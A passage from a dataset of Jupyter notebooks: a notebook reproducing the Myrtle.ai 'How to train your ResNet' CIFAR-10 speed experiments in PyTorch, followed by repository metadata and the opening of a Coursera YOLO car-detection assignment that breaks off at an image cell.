[
"from IPython.core.display import display, HTML\ndisplay(HTML(\"<style>.container {width:95% !important;}</style>\"))\n\nfrom core import *\nfrom torch_backend import *\n\ncolors = ColorMap()\ndraw = lambda graph: display(DotGraph({p: ({'fillcolor': colors[type(v)], 'tooltip': repr(v)}, inputs) for p, (v, inputs) in graph.items() if v is not None}))",
"_____no_output_____"
]
],
[
[
"### Network definitions",
"_____no_output_____"
]
],
[
[
"batch_norm = partial(BatchNorm, weight_init=None, bias_init=None)\n\ndef res_block(c_in, c_out, stride, **kw):\n block = {\n 'bn1': batch_norm(c_in, **kw),\n 'relu1': nn.ReLU(True),\n 'branch': {\n 'conv1': nn.Conv2d(c_in, c_out, kernel_size=3, stride=stride, padding=1, bias=False),\n 'bn2': batch_norm(c_out, **kw),\n 'relu2': nn.ReLU(True),\n 'conv2': nn.Conv2d(c_out, c_out, kernel_size=3, stride=1, padding=1, bias=False),\n }\n }\n projection = (stride != 1) or (c_in != c_out) \n if projection:\n block['conv3'] = (nn.Conv2d(c_in, c_out, kernel_size=1, stride=stride, padding=0, bias=False), ['relu1'])\n block['add'] = (Add(), [('conv3' if projection else 'relu1'), 'branch/conv2'])\n return block\n\ndef DAWN_net(c=64, block=res_block, prep_bn_relu=False, concat_pool=True, **kw): \n if isinstance(c, int):\n c = [c, 2*c, 4*c, 4*c]\n \n classifier_pool = {\n 'in': Identity(),\n 'maxpool': nn.MaxPool2d(4),\n 'avgpool': (nn.AvgPool2d(4), ['in']),\n 'concat': (Concat(), ['maxpool', 'avgpool']),\n } if concat_pool else {'pool': nn.MaxPool2d(4)}\n \n return {\n 'input': (None, []),\n 'prep': union({'conv': nn.Conv2d(3, c[0], kernel_size=3, stride=1, padding=1, bias=False)},\n {'bn': batch_norm(c[0], **kw), 'relu': nn.ReLU(True)} if prep_bn_relu else {}),\n 'layer1': {\n 'block0': block(c[0], c[0], 1, **kw),\n 'block1': block(c[0], c[0], 1, **kw),\n },\n 'layer2': {\n 'block0': block(c[0], c[1], 2, **kw),\n 'block1': block(c[1], c[1], 1, **kw),\n },\n 'layer3': {\n 'block0': block(c[1], c[2], 2, **kw),\n 'block1': block(c[2], c[2], 1, **kw),\n },\n 'layer4': {\n 'block0': block(c[2], c[3], 2, **kw),\n 'block1': block(c[3], c[3], 1, **kw),\n },\n 'final': union(classifier_pool, {\n 'flatten': Flatten(),\n 'linear': nn.Linear(2*c[3] if concat_pool else c[3], 10, bias=True),\n }),\n 'logits': Identity(),\n }\n\n\ndef conv_bn(c_in, c_out, bn_weight_init=1.0, **kw):\n return {\n 'conv': nn.Conv2d(c_in, c_out, kernel_size=3, stride=1, padding=1, bias=False), \n 'bn': batch_norm(c_out, bn_weight_init=bn_weight_init, **kw), \n 'relu': nn.ReLU(True)\n }\n\ndef basic_net(channels, weight, pool, **kw):\n return {\n 'input': (None, []),\n 'prep': conv_bn(3, channels['prep'], **kw),\n 'layer1': dict(conv_bn(channels['prep'], channels['layer1'], **kw), pool=pool),\n 'layer2': dict(conv_bn(channels['layer1'], channels['layer2'], **kw), pool=pool),\n 'layer3': dict(conv_bn(channels['layer2'], channels['layer3'], **kw), pool=pool),\n 'pool': nn.MaxPool2d(4),\n 'flatten': Flatten(),\n 'linear': nn.Linear(channels['layer3'], 10, bias=False),\n 'logits': Mul(weight),\n }\n\ndef net(channels=None, weight=0.125, pool=nn.MaxPool2d(2), extra_layers=(), res_layers=('layer1', 'layer3'), **kw):\n channels = channels or {'prep': 64, 'layer1': 128, 'layer2': 256, 'layer3': 512}\n residual = lambda c, **kw: {'in': Identity(), 'res1': conv_bn(c, c, **kw), 'res2': conv_bn(c, c, **kw), \n 'add': (Add(), ['in', 'res2/relu'])}\n n = basic_net(channels, weight, pool, **kw)\n for layer in res_layers:\n n[layer]['residual'] = residual(channels[layer], **kw)\n for layer in extra_layers:\n n[layer]['extra'] = conv_bn(channels[layer], channels[layer], **kw) \n return n\n\nremove_identity_nodes = lambda net: remove_by_type(net, Identity)",
"_____no_output_____"
]
],
[
[
"### Download and preprocess data",
"_____no_output_____"
]
],
[
[
"DATA_DIR = './data'\ndataset = cifar10(DATA_DIR)\ntimer = Timer()\nprint('Preprocessing training data')\ntransforms = [\n partial(normalise, mean=np.array(cifar10_mean, dtype=np.float32), std=np.array(cifar10_std, dtype=np.float32)),\n partial(transpose, source='NHWC', target='NCHW'), \n]\ntrain_set = list(zip(*preprocess(dataset['train'], [partial(pad, border=4)] + transforms).values()))\nprint(f'Finished in {timer():.2} seconds')\nprint('Preprocessing test data')\ntest_set = list(zip(*preprocess(dataset['valid'], transforms).values()))\nprint(f'Finished in {timer():.2} seconds')",
"Files already downloaded and verified\nFiles already downloaded and verified\nPreprocessing training data\nFinished in 3.1 seconds\nPreprocessing test data\nFinished in 0.14 seconds\n"
]
],
[
[
"### Training loop",
"_____no_output_____"
]
],
[
[
"def train(model, lr_schedule, train_set, test_set, batch_size, num_workers=0):\n train_batches = DataLoader(train_set, batch_size, shuffle=True, set_random_choices=True, num_workers=num_workers)\n test_batches = DataLoader(test_set, batch_size, shuffle=False, num_workers=num_workers)\n \n lr = lambda step: lr_schedule(step/len(train_batches))/batch_size\n opts = [SGD(trainable_params(model).values(), {'lr': lr, 'weight_decay': Const(5e-4*batch_size), 'momentum': Const(0.9)})]\n logs, state = Table(), {MODEL: model, LOSS: x_ent_loss, OPTS: opts}\n for epoch in range(lr_schedule.knots[-1]):\n logs.append(union({'epoch': epoch+1, 'lr': lr_schedule(epoch+1)}, \n train_epoch(state, Timer(torch.cuda.synchronize), train_batches, test_batches)))\n return logs",
"_____no_output_____"
]
],
[
[
"### [Post 1: Baseline](https://www.myrtle.ai/2018/09/24/how_to_train_your_resnet_1/) - DAWNbench baseline + no initial bn-relu+ efficient dataloading/augmentation, 1 dataloader process (301s)",
"_____no_output_____"
]
],
[
[
"lr_schedule = PiecewiseLinear([0, 15, 30, 35], [0, 0.1, 0.005, 0])\nbatch_size = 128\n\nn = DAWN_net()\ndraw(build_graph(n))\nmodel = Network(n).to(device)\n#convert all children including batch norms to half precision (triggering slow codepath!)\nfor v in model.children(): \n v.half()\ntrain_set_x = Transform(train_set, [Crop(32, 32), FlipLR()])\nsummary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=1)",
"_____no_output_____"
]
],
[
[
"### [Post 1: Baseline](https://www.myrtle.ai/2018/09/24/how_to_train_your_resnet_1/) - 0 dataloader processes (297s)",
"_____no_output_____"
]
],
[
[
"lr_schedule = PiecewiseLinear([0, 15, 30, 35], [0, 0.1, 0.005, 0])\nbatch_size = 128\n\nn = DAWN_net()\ndraw(build_graph(n))\nmodel = Network(n).to(device)\n#convert all children including batch norms to half precision (triggering slow codepath!)\nfor v in model.children(): \n v.half()\ntrain_set_x = Transform(train_set, [Crop(32, 32), FlipLR()])\nsummary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)",
"_____no_output_____"
]
],
[
[
"### [Post 2: Mini-batches](https://www.myrtle.ai/2018/09/24/how_to_train_your_resnet_2/) - batch size=512 (256s)",
"_____no_output_____"
]
],
[
[
"lr_schedule = PiecewiseLinear([0, 15, 30, 35], [0, 0.44, 0.005, 0])\nbatch_size = 512\n\nn = DAWN_net()\ndraw(build_graph(n))\nmodel = Network(n).to(device)\n#convert all children including batch norms to half precision (triggering slow codepath!)\nfor v in model.children(): \n v.half()\ntrain_set_x = Transform(train_set, [Crop(32, 32), FlipLR()])\nsummary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)",
"_____no_output_____"
]
],
[
[
"### [Post 3: Regularisation](https://www.myrtle.ai/2018/09/24/how_to_train_your_resnet_3/) - speed up batch norms (186s)",
"_____no_output_____"
]
],
[
[
"lr_schedule = PiecewiseLinear([0, 15, 30, 35], [0, 0.44, 0.005, 0])\nbatch_size = 512\n\nn = DAWN_net()\ndraw(build_graph(n))\nmodel = Network(n).to(device).half()\ntrain_set_x = Transform(train_set, [Crop(32, 32), FlipLR()])\nsummary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)",
"_____no_output_____"
]
],
[
[
"### [Post 3: Regularisation](https://www.myrtle.ai/2018/09/24/how_to_train_your_resnet_3/) - cutout+30 epochs+batch_size=512 (161s)",
"_____no_output_____"
]
],
[
[
"lr_schedule = PiecewiseLinear([0, 8, 30], [0, 0.4, 0])\nbatch_size = 512\n\nn = DAWN_net()\ndraw(build_graph(n))\nmodel = Network(n).to(device).half()\ntrain_set_x = Transform(train_set, [Crop(32, 32), FlipLR(), Cutout(8,8)])\nsummary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)",
"_____no_output_____"
]
],
[
[
"### [Post 3: Regularisation](https://www.myrtle.ai/2018/09/24/how_to_train_your_resnet_3/) - batch_size=768 (154s)",
"_____no_output_____"
]
],
[
[
"lr_schedule = PiecewiseLinear([0, 8, 30], [0, 0.6, 0])\nbatch_size = 768\n\nn = DAWN_net()\ndraw(build_graph(n))\nmodel = Network(n).to(device).half()\ntrain_set_x = Transform(train_set, [Crop(32, 32), FlipLR(), Cutout(8,8)])\nsummary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)",
"_____no_output_____"
]
],
[
[
"### [Post 4: Architecture](https://www.myrtle.ai/2018/10/26/how_to_train_your_resnet_4/) - backbone (36s; test acc 55.9%)\n\nIt seems reasonable to study how the shortest path through the network trains in isolation and to take steps to improve this before adding back the longer branches. \nEliminating the long branches yields the following backbone network in which all convolutions, except for the initial one, have a stride of two.\n\nTraining the shortest path network for 20 epochs yields an unimpressive test accuracy of 55.9% in 36 seconds.",
"_____no_output_____"
]
],
[
[
"def shortcut_block(c_in, c_out, stride, **kw):\n block = {\n 'bn1': batch_norm(c_in, **kw),\n 'relu1': nn.ReLU(True),\n }\n projection = (stride != 1) or (c_in != c_out) \n if projection:\n block['conv3'] = (nn.Conv2d(c_in, c_out, kernel_size=1, stride=stride, padding=0, bias=False), ['relu1'])\n return block\n\nlr_schedule = PiecewiseLinear([0, 4, 20], [0, 0.4, 0])\nbatch_size = 512\n\nn = DAWN_net(block=shortcut_block)\ndraw(build_graph(n))\nmodel = Network(n).to(device).half()\ntrain_set_x = Transform(train_set, [Crop(32, 32), FlipLR(), Cutout(8,8)])\nsummary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)",
"_____no_output_____"
]
],
[
[
"### [Post 4: Architecture](https://www.myrtle.ai/2018/10/26/how_to_train_your_resnet_4/) - backbone, remove repeat bn-relu (32s; test acc 56.0%)\n\nRemoving the repeated batch norm-ReLU groups, reduces training time to 32s and leaves test accuracy approximately unchanged.",
"_____no_output_____"
]
],
[
[
"def shortcut_block(c_in, c_out, stride, **kw):\n projection = (stride != 1) or (c_in != c_out)\n if projection:\n return {\n 'conv': nn.Conv2d(c_in, c_out, kernel_size=1, stride=stride, padding=0, bias=False), \n 'bn': batch_norm(c_out, **kw),\n 'relu': nn.ReLU(True),\n }\n else:\n return {'id': Identity()}\n\nlr_schedule = PiecewiseLinear([0, 4, 20], [0, 0.4, 0])\nbatch_size = 512\n\nn = DAWN_net(block=shortcut_block, prep_bn_relu=True)\ndraw(build_graph(n))\nmodel = Network(n).to(device).half()\ntrain_set_x = Transform(train_set, [Crop(32, 32), FlipLR(), Cutout(8,8)])\nsummary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)",
"_____no_output_____"
]
],
[
[
"### [Post 4: Architecture](https://www.myrtle.ai/2018/10/26/how_to_train_your_resnet_4/) - backbone, 3x3 convs (36s; test acc 85.6%)\n\nA serious shortcoming of this network is that the downsampling convolutions have 1x1 kernels and a stride of two, so that rather than enlarging the receptive field they are simply discarding information. \n\nIf we replace these with 3x3 convolutions, things improve considerably and test accuracy after 20 epochs is 85.6% in a time of 36s.",
"_____no_output_____"
]
],
[
[
"def shortcut_block(c_in, c_out, stride, **kw):\n projection = (stride != 1) or (c_in != c_out)\n if projection:\n return {\n 'conv': nn.Conv2d(c_in, c_out, kernel_size=3, stride=stride, padding=1, bias=False), \n 'bn': batch_norm(c_out, **kw),\n 'relu': nn.ReLU(True),\n }\n else:\n return {'id': Identity()}\n\nlr_schedule = PiecewiseLinear([0, 4, 20], [0, 0.4, 0])\nbatch_size = 512\n\nn = DAWN_net(block=shortcut_block, prep_bn_relu=True)\ndraw(build_graph(n))\nmodel = Network(n).to(device).half()\ntrain_set_x = Transform(train_set, [Crop(32, 32), FlipLR(), Cutout(8,8)])\nsummary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)",
"_____no_output_____"
]
],
[
[
"### [Post 4: Architecture](https://www.myrtle.ai/2018/10/26/how_to_train_your_resnet_4/) - backbone, maxpool downsampling (43s; test acc 89.7%)\n\nWe can further improve the downsampling stages by applying 3x3 convolutions of stride one followed by a pooling layer instead of using strided convolutions. \n\nWe choose max pooling with a 2x2 window size leading to a final test accuracy of 89.7% after 43s. Using average pooling gives a similar result but takes slightly longer.",
"_____no_output_____"
]
],
[
[
"def shortcut_block(c_in, c_out, stride, **kw):\n projection = (stride != 1) or (c_in != c_out)\n if projection:\n return {\n 'conv': nn.Conv2d(c_in, c_out, kernel_size=3, stride=1, padding=1, bias=False), \n 'bn': batch_norm(c_out, **kw),\n 'relu': nn.ReLU(True),\n 'pool': nn.MaxPool2d(2),\n }\n else:\n return {'id': Identity()}\n\nlr_schedule = PiecewiseLinear([0, 4, 20], [0, 0.4, 0])\nbatch_size = 512\n\nn = DAWN_net(block=shortcut_block, prep_bn_relu=True)\ndraw(build_graph(n))\nmodel = Network(n).to(device).half()\ntrain_set_x = Transform(train_set, [Crop(32, 32), FlipLR(), Cutout(8,8)])\nsummary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)",
"_____no_output_____"
]
],
[
[
"### [Post 4: Architecture](https://www.myrtle.ai/2018/10/26/how_to_train_your_resnet_4/) - backbone, 2x output dim, global maxpool (47s; test acc 90.7%)\n\nThe final pooling layer before the classifier is a concatenation of global average pooling and max pooling layers, inherited from the original network. \n\nWe replace this with a more standard global max pooling layer and double the output dimension of the final convolution to compensate for the reduction in input dimension to the classifier, leading to a final test accuracy of 90.7% in 47s. Note that average pooling at this stage underperforms max pooling significantly.\n",
"_____no_output_____"
]
],
[
[
"def shortcut_block(c_in, c_out, stride, **kw):\n projection = (stride != 1) or (c_in != c_out)\n if projection:\n return {\n 'conv': nn.Conv2d(c_in, c_out, kernel_size=3, stride=1, padding=1, bias=False), \n 'bn': batch_norm(c_out, **kw),\n 'relu': nn.ReLU(True),\n 'pool': nn.MaxPool2d(2),\n }\n else:\n return {'id': Identity()}\n\nlr_schedule = PiecewiseLinear([0, 4, 20], [0, 0.4, 0])\nbatch_size = 512\n\nn = DAWN_net(c=[64,128,256,512], block=shortcut_block, prep_bn_relu=True, concat_pool=False)\ndraw(build_graph(n))\nmodel = Network(n).to(device).half()\ntrain_set_x = Transform(train_set, [Crop(32, 32), FlipLR(), Cutout(8,8)])\nsummary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)",
"_____no_output_____"
]
],
[
[
"### [Post 4: Architecture](https://www.myrtle.ai/2018/10/26/how_to_train_your_resnet_4/) - backbone, bn scale init=1, classifier weight=0.125 (47s; test acc 91.1%)\n\nBy default in PyTorch (0.4), initial batch norm scales are chosen uniformly at random from the interval [0,1]. Channels which are initialised near zero could be wasted so we replace this with a constant initialisation at 1. \nThis leads to a larger signal through the network and to compensate we introduce an overall constant multiplicative rescaling of the final classifier. A rough manual optimisation of this extra hyperparameter suggest that 0.125 is a reasonable value. \n(The low value makes predictions less certain and appears to ease optimisation.) \n\nWith these changes in place, 20 epoch training reaches a test accuracy of 91.1% in 47s. ",
"_____no_output_____"
]
],
[
[
"lr_schedule = PiecewiseLinear([0, 4, 20], [0, 0.4, 0])\nbatch_size = 512\n\nn = net(extra_layers=(), res_layers=())\ndraw(build_graph(n))\nmodel = Network(n).to(device).half()\ntrain_set_x = Transform(train_set, [Crop(32, 32), FlipLR(), Cutout(8,8)])\nsummary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)",
"_____no_output_____"
]
],
[
[
"### [Post 4: Architecture](https://www.myrtle.ai/2018/10/26/how_to_train_your_resnet_4/) - double width, 60 epoch train! (321s; test acc 93.5%)\n\nne approach that doesn't seem particularly promising is to just add width. \n\nIf we double the channel dimensions and train for 60 epochs we can reach 93.5% test accuracy with a 5 layer network. This is nice but not efficient since training now takes 321s.",
"_____no_output_____"
]
],
[
[
"lr_schedule = PiecewiseLinear([0, 12, 60], [0, 0.4, 0])\nbatch_size = 512\nc = 128\n\nn = net(channels={'prep': c, 'layer1': 2*c, 'layer2': 4*c, 'layer3': 8*c}, extra_layers=(), res_layers=())\ndraw(build_graph(n))\nmodel = Network(n).to(device).half()\ntrain_set_x = Transform(train_set, [Crop(32, 32), FlipLR(), Cutout(8,8)])\nsummary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)",
"_____no_output_____"
]
],
[
[
"### [Post 4: Architecture](https://www.myrtle.ai/2018/10/26/how_to_train_your_resnet_4/) - extra:L1+L2+L3 network, 60 epochs, cutout=12 (180s, 95.0% test acc) ",
"_____no_output_____"
]
],
[
[
"lr_schedule = PiecewiseLinear([0, 12, 60], [0, 0.4, 0])\nbatch_size = 512\ncutout=12\n\nn = net(extra_layers=['layer1', 'layer2', 'layer3'], res_layers=())\ndraw(build_graph(n))\nmodel = Network(n).to(device).half()\ntrain_set_x = Transform(train_set, [Crop(32, 32), FlipLR(), Cutout(cutout, cutout)])\nsummary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)",
"_____no_output_____"
]
],
[
[
"### [Post 4: Architecture](https://www.myrtle.ai/2018/10/26/how_to_train_your_resnet_4/) - final network Residual:L1+L3, 20 epochs (66s; test acc 93.7%)",
"_____no_output_____"
]
],
[
[
"lr_schedule = PiecewiseLinear([0, 4, 20], [0, 0.4, 0])\nbatch_size = 512\n\nn = net()\ndraw(build_graph(n))\nmodel = Network(n).to(device).half()\ntrain_set_x = Transform(train_set, [Crop(32, 32), FlipLR(), Cutout(8,8)])\nsummary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)",
"_____no_output_____"
]
],
[
[
"### [Post 4: Architecture](https://www.myrtle.ai/2018/10/26/how_to_train_your_resnet_4/) - final network, 24 epochs (79s; test acc 94.1%)",
"_____no_output_____"
]
],
[
[
"lr_schedule = PiecewiseLinear([0, 5, 24], [0, 0.4, 0])\nbatch_size = 512\n\nn = net()\ndraw(build_graph(n))\nmodel = Network(n).to(device).half()\ntrain_set_x = Transform(train_set, [Crop(32, 32), FlipLR(), Cutout(8,8)])\nsummary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb51926b528e8a23d932dceb7a2b15b7b4adb147 | 7,890 | ipynb | Jupyter Notebook | data/data_cleaning_step2.ipynb | iceicery/trick-or-tree | 65f91e1d1035db1eb21d913c4384d0f7a5323990 | [
"MIT"
] | null | null | null | data/data_cleaning_step2.ipynb | iceicery/trick-or-tree | 65f91e1d1035db1eb21d913c4384d0f7a5323990 | [
"MIT"
] | null | null | null | data/data_cleaning_step2.ipynb | iceicery/trick-or-tree | 65f91e1d1035db1eb21d913c4384d0f7a5323990 | [
"MIT"
] | null | null | null | 25.533981 | 132 | 0.451584 | [
[
[
"import geopandas as gpd\nimport pandas as pd\nimport numpy as np",
"_____no_output_____"
],
[
"gdf = gpd.read_file('al_champTree_leafimg_wiki.geojson')\n",
"_____no_output_____"
],
[
"gdf[gdf.species_x == 'CEDAR']",
"_____no_output_____"
],
[
"for i in gdf.scientific_name.values:\n if 'opulus' in i:\n print(i)",
"Populus deltoides\nPopulus heterophylla\n"
],
[
"import os",
"_____no_output_____"
],
[
"gdf.loc[1,'image_path']",
"_____no_output_____"
],
[
"pw",
"_____no_output_____"
],
[
"rpath = '/home/ctchen/work_scripts/sideprojects/HATCH2021/'\nfor i in range(len(gdf)):\n if gdf.loc[i,'image_path'] is not None:\n os.system('cp ' + rpath + gdf.loc[i,'image_path'] + ' ' + rpath + '/trick-or-tree/' + gdf.loc[i,'image_path'])",
"_____no_output_____"
],
[
"rpath = '/home/ctchen/work_scripts/sideprojects/HATCH2021/'\nfor i in range(len(gdf)):\n if gdf.loc[i,'segmented_path'] is not None:\n os.system('cp ' + rpath + gdf.loc[i,'segmented_path'] + ' ' + rpath + '/trick-or-tree/' + gdf.loc[i,'segmented_path'])",
"_____no_output_____"
],
[
"newgdf = gdf.copy()",
"_____no_output_____"
],
[
"for i in range(len(gdf)):\n if gdf.loc[i,'image_path'] is not None:\n oldimg = gdf.loc[i,'image_path']\n newgdf.loc[i,'image_path'] = 'https://github.com/iceicery/trick-or-tree/blob/main/' + oldimg + '?raw=true'\n",
"_____no_output_____"
],
[
"newgdf.loc[150,'image_path']",
"_____no_output_____"
],
[
"newgdf.to_file('NEWal_champTree_leafimg_wiki.geojson',driver='GeoJSON')",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb51ab9f57ce4b10a651590f1029965aa96d5aaf | 47,513 | ipynb | Jupyter Notebook | 13_Fracture_slip_and_area_in_rock_failure.ipynb | Zqs0527/geothermics | 8001c93cee3091e8d5e0d4dc3fabbf1463aa4c15 | [
"MIT"
] | 34 | 2017-03-31T22:22:00.000Z | 2022-02-07T23:22:23.000Z | 13_Fracture_slip_and_area_in_rock_failure.ipynb | Zqs0527/geothermics | 8001c93cee3091e8d5e0d4dc3fabbf1463aa4c15 | [
"MIT"
] | 2 | 2019-11-25T08:57:00.000Z | 2019-12-10T15:21:23.000Z | 13_Fracture_slip_and_area_in_rock_failure.ipynb | Zqs0527/geothermics | 8001c93cee3091e8d5e0d4dc3fabbf1463aa4c15 | [
"MIT"
] | 10 | 2018-06-07T09:58:16.000Z | 2021-09-30T01:09:43.000Z | 207.480349 | 41,064 | 0.906215 | [
[
[
"# Radius and mean slip of rock patches failing in micro-seismic events\n\nWhen stresses in a rock surpass its shear strength, the affected rock volume will fail to shearing. \nAssume that we observe a circular patch with radius $r$ on, e.g. a fault, and that this patch is affected by a slip with an average slip distance $d$. \nThis slip is a response to increasing shear stresses, hence it reduces shear stresses by $\\Delta \\tau$. \n\nThese three parameters are linked by: \n\n$$\\Delta \\tau = \\frac{7 \\, \\pi \\, \\mu}{16 \\, r} \\, d $$ \n\nwhere $\\mu$ is the shear modulus near the fault. \n\nThe seismic moment $M_0$, the energy to offset an area $A$ by a distance $d$, is defined by: \n\n$$M_0 = \\mu \\, d \\, A$$ \n\n$$ d = \\frac{M_0}{\\mu \\, A} $$\nwith $A = \\pi r^2$. \nThe [USGS definition](https://earthquake.usgs.gov/learn/glossary/?term=seismic%20moment) for the seismic moments is: *The seismic moment is a measure of the size of an earthquake based on the area of fault rupture, the average amount of slip, and the force that was required to overcome the friction sticking the rocks together that were offset by faulting. Seismic moment can also be calculated from the amplitude spectra of seismic waves.*\n\nPutting the $d = ...$ equation in the first one and solving for the radius yields: \n\n$$r = \\bigg(\\frac{7 \\, M_0}{16 \\, \\Delta \\tau}\\bigg)^{1/3}$$\n\nThe following code leads to a plot which relates the influenced radius $r$ to the average displacement $d$ for micro-earthquakes. It shows that a larger area can be affected by smaller displacements for a small shear stress reduction $\\Delta \\tau$ to bigger displacements for smaller areas for larger shear stress reductions. \n",
"_____no_output_____"
]
],
[
[
"# import libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\n%matplotlib inline\n\nimport seaborn as sns\nsns.set_style('ticks')\nsns.set_context('talk')",
"_____no_output_____"
],
[
"def get_displacement(mu, dtau, m0):\n \n r = ((7*m0)/(16*dtau))**(1./3.)\n\n d = m0 / (mu*r**2 * np.pi)\n \n # Alternatively:\n # od = np.pi * mu * r * (7/(16*dtau*m0**2))**(1./3.)\n # d = 1 / od\n return r, d\n ",
"_____no_output_____"
],
[
"# Parameters\ndtau = np.arange(1,11)*1e6 # shear stress reduction \nm0 = np.array([3.2e10, 1.0e12, 3.2e13]) # seismic moment\nmu = 2.5e10 # shear modulus",
"_____no_output_____"
],
[
"# calculate displacements and radius\ndisplacements = np.concatenate([get_displacement(mu, x, m0) for x in dtau]) \n\n# seperate arrays\ndisps = displacements[1::2,:]\nrads = displacements[0::2,:]\n\n# min tau and max tau\nmitau = np.polyfit(disps[0,:], rads[0,:],1)\nmatau = np.polyfit(disps[-1,:], rads[-1,:],1)\n\ndsim = np.linspace(0,0.033)\nmirad = mitau[0]*dsim+mitau[1]\nmarad = matau[0]*dsim+matau[1]",
"_____no_output_____"
],
[
"# plot results\nfig = plt.figure(figsize=[12,7])\nplt.plot(disps[:,0]*1000, rads[:,0], '.', label='M$_w$1')\nplt.plot(disps[:,1]*1000, rads[:,1], '^', label='M$_w$2')\nplt.plot(disps[:,2]*1000, rads[:,2], 's', label='M$_w$3')\n\nplt.plot(dsim*1000, mirad, '-', color='gray', alpha=.5)\nplt.plot(dsim*1000, marad, '-', color='gray', alpha=.5)\nplt.legend()\n\nplt.ylim([0, 300])\nplt.xlim([0, 0.033*1000])\n\nplt.text(.8, 200, '$\\Delta tau = 1$ MPa', fontsize=14)\nplt.text(20, 55, '$\\Delta tau = 10$ MPa', fontsize=14)\n\nplt.xlabel('average displacement [mm]')\nplt.ylabel('influenced radius [m]')\n#fig.savefig('displacement_radius.png', dpi=300, bbox_inches='tight')",
"_____no_output_____"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
]
] |
cb51adfdc4bedf0f5b4f124cf40b4b33fea19be0 | 256,587 | ipynb | Jupyter Notebook | DeepLearningSpecialisation/4_CNN/Autonomous_driving_application_Car_detection_v3a.ipynb | pradeeptadas/coursera | c3b7daddaca9ba67de2bf488283ede6fe7bd560b | [
"MIT"
] | null | null | null | DeepLearningSpecialisation/4_CNN/Autonomous_driving_application_Car_detection_v3a.ipynb | pradeeptadas/coursera | c3b7daddaca9ba67de2bf488283ede6fe7bd560b | [
"MIT"
] | null | null | null | DeepLearningSpecialisation/4_CNN/Autonomous_driving_application_Car_detection_v3a.ipynb | pradeeptadas/coursera | c3b7daddaca9ba67de2bf488283ede6fe7bd560b | [
"MIT"
] | null | null | null | 167.266623 | 179,682 | 0.847175 | [
[
[
"# Autonomous driving - Car detection\n\nWelcome to your week 3 programming assignment. You will learn about object detection using the very powerful YOLO model. Many of the ideas in this notebook are described in the two YOLO papers: [Redmon et al., 2016](https://arxiv.org/abs/1506.02640) and [Redmon and Farhadi, 2016](https://arxiv.org/abs/1612.08242). \n\n**You will learn to**:\n- Use object detection on a car detection dataset\n- Deal with bounding boxes\n\n",
"_____no_output_____"
],
[
"## <font color='darkblue'>Updates</font>\n\n#### If you were working on the notebook before this update...\n* The current notebook is version \"3a\".\n* You can find your original work saved in the notebook with the previous version name (\"v3\") \n* To view the file directory, go to the menu \"File->Open\", and this will open a new tab that shows the file directory.\n\n#### List of updates\n* Clarified \"YOLO\" instructions preceding the code. \n* Added details about anchor boxes.\n* Added explanation of how score is calculated.\n* `yolo_filter_boxes`: added additional hints. Clarify syntax for argmax and max.\n* `iou`: clarify instructions for finding the intersection.\n* `iou`: give variable names for all 8 box vertices, for clarity. Adds `width` and `height` variables for clarity.\n* `iou`: add test cases to check handling of non-intersecting boxes, intersection at vertices, or intersection at edges.\n* `yolo_non_max_suppression`: clarify syntax for tf.image.non_max_suppression and keras.gather.\n* \"convert output of the model to usable bounding box tensors\": Provides a link to the definition of `yolo_head`.\n* `predict`: hint on calling sess.run.\n* Spelling, grammar, wording and formatting updates to improve clarity.",
"_____no_output_____"
],
[
"## Import libraries\nRun the following cell to load the packages and dependencies that you will find useful as you build the object detector!",
"_____no_output_____"
]
],
[
[
"import argparse\nimport os\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import imshow\nimport scipy.io\nimport scipy.misc\nimport numpy as np\nimport pandas as pd\nimport PIL\nimport tensorflow as tf\nfrom keras import backend as K\nfrom keras.layers import Input, Lambda, Conv2D\nfrom keras.models import load_model, Model\nfrom yolo_utils import read_classes, read_anchors, generate_colors, preprocess_image, draw_boxes, scale_boxes\nfrom yad2k.models.keras_yolo import yolo_head, yolo_boxes_to_corners, preprocess_true_boxes, yolo_loss, yolo_body\n\n%matplotlib inline",
"Using TensorFlow backend.\n"
]
],
[
[
